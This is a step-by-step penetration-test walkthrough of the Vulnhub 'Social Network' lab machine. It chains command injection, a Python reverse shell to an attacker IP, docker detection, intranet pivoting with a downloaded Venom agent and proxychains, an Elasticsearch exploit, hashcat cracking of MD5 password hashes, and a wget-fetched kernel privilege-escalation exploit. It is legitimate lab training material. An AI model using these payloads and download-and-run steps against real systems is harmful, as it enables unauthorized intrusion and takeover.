Vulnhub Social Network

Penetration Test
,

[SOCIAL NETWORK]

Difficulty: Medium→High
Score: 7.5/10

Target

  1. Root privilege

Process

Reconnasissance

sudo arp-scan -I eth0 -l

Port Scan

sudo nmap -p- 192.168.0.109


Port service scan

Python web application | SSH service

Access the port 5000 to see what are things here.

Path Brute Force enumeration

sudo dirsearch -u http://192.168.0.109:5000

Found the admin directory

Delivery

Command injection

After we acessing the website, we found the command injection vulnerability

we can make python reverse shell to control the machine

Python reverse shell

listening on local machine port 5555

nc -lnvp 5555

input the python shell code in the website

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

OK, that worked!

Command and Control

We found we get the root privilege easliy… I think I stuck in the docker

3 ways to check if we are in docker

  1. Check if exist the .dockerenv file in root directory
ls /.dockerenv
  1. Check if exist docker directory in /proc/1/cgroup
cat /proc/1/cgroup
  1. input env command, we will find something about docker
env

After we check, we actually be in the docker. Let’s break it out!

Escape the docker

We found there isn’t netdiscover, arp and so on local network discover tools in this docker, we only use the basic way to ping other machine in the same local network.

for i in $(seq 1 254); do ping -c 1 172.17.0.$i;done

Luckly we found the 172.17.0.1,172.17.0.2,172.17.0.3 is alive

Intranet penetration

We use the Venom which is the excellent tool to help us penetrate the intranet.
Local machine we execute the Venom to listen on the port 9999

./admin_linux_x64 -lport 9999


Transfer the Venom_agent file to docker

[docker machine]
cd /tmp
wget -c http://192.168.0.108/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.0.108 -rport 9999

That worded!

Next step we have to control the node and build the socks5 tunnel

The proxychains is a good tool to connect the tunnel

vi /etc/proxychains4.conf
socks5  127.0.0.1 1080

Scan intranet port with proxychains

sudo proxychains nmap -Pn -sT -sV 172.17.0.1
sudo proxychains nmap -Pn -sT -sV 172.17.0.2
sudo proxychains nmap -Pn -sT -sV 172.17.0.3

Oh well, Elasticsearch sound could be exploited

Use metasploit search poc

searchsploit Elasticsearch


copy the file to desktop
write some data to Elasticsearch

proxychains curl -XPOST '172.17.0.2:9200/twitter/user/yren' -d '{"name":"Wu"}'


Attack the Elasticsearch with proxychains

sudo proxychains python2 36337.py 172.17.0.2

Privilege Escalation

Ok we got root shell but we still stuck in the docker

We found the passwords files in the current directory.

The password consists of eight digits. The first four digits are numbers and the last four digits are letters
Extract the hash to new text

Use the hashcat to solve the hash

cat pwd.hash
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
hashcat --username -m 0 -a 3 pwd.hash ?d?d?d?d?l?l?l?l --force
hashcat --username -m 0 -a 3 pwd.hash ?d?d?d?d?l?l?l?l --force --show
john:3f8184a7343664553fcb5337a3138814:1337hack
test:861f194e9d6118f3d942a72be3e51749:1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b:1111pass
root:b3d34352fc26117979deabdf1b9b6354:1234pass // That's wrong password shit!
jane:5c158b60ed97c723b673529b8a3cf72b:1234jane

We connect the virtual machine with ssh.

ssh [email protected]


Check the system version

uname -a


Search poc

searchsploit linux 3.13.0 ubuntu priv


We found there’s no gcc environment in virtual machine we have to generate executable file

We found that the exp need another file ofs-lib.so

Find it and copy it in current directory

upload the exp and ofs-lib.so to virtual machine

[kali open the server]
python3 -m http.server 80
[virtual machine]
cd /tmp
wget http://192.168.0.108/exp
wget http://192.168.0.108/ofs-lib.so

Get root

chmod +x exp
./exp
id

Summary

That’s excellent experiment for me. It cotains intranet penestration and high-level privilege escalation. The most dificult part is you have to modify the original exp to create a suitable exp for this virtual machine. Because it does have gcc environment, we generated the executable file to it. To use the exp, we should see the code first.